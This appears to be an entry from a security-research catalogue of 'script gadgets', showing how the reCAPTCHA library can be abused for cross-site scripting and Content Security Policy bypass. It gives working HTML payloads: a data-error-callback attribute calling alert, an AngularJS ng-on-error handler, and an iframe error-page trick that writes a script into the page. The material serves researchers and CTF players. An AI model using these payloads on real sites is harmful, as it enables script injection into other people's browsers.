.. / recaptcha

Star Fork

reCAPTCHA is a free service that protects your site from spam and abuse. It uses advanced risk analysis techniques to tell humans and bots apart.

Latest (1)

<any> @class @data-* ⏱️ before-load

• The reCAPTCHA library allows to call a function under specific events (e.g. error-callback) through data-* attributes.

  <script src="https://www.google.com/recaptcha/api.js" async defer></script>
  
  <!-- user input -->
  <x class="g-recaptcha" data-sitekey="1337" data-error-callback="alert"></x>

  Preview Copy

Related links:

• https://developers.google.com/recaptcha/docs/display#render_param
• https://gist.github.com/terjanq/e2198440c4fdfbdec43e921b600d4a1d#recaptcha-for-the-rescue
• https://blog.huli.tw/2022/04/13/en/notes-challenge-author-writeup/

Latest (2)

<any> @custom 🛡️ wh-host 🛡️ unsafe-eval ⏱️ before-load

• The reCAPTCHA library brings under the hood AngularJS.

  <script nonce="secret" src='https://www.google.com/recaptcha/about/js/main.min.js'></script>
  
  <!-- user input -->
  <img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)'>

  Preview Copy

• The is another more generic payload that can be used to bypass CSP using error pages.

  <script nonce="secret" src='https://www.google.com/recaptcha/about/js/main.min.js'></script>
  
  <!-- user input -->
  <iframe id="ifr" src="/%GG"></iframe>
  <img src=x ng-on-error="
    win=$event.target.ownerDocument.defaultView;
    win.ifr.contentWindow.document.write.bind(win.ifr.contentWindow.document, ['<script>alert(document.domain)</script>'])()
  ">

  Preview Copy

Related links:

• https://github.com/google/google-ctf/tree/main/2023/quals/web-noteninja
• https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/

Found by @terjanq.

Source | History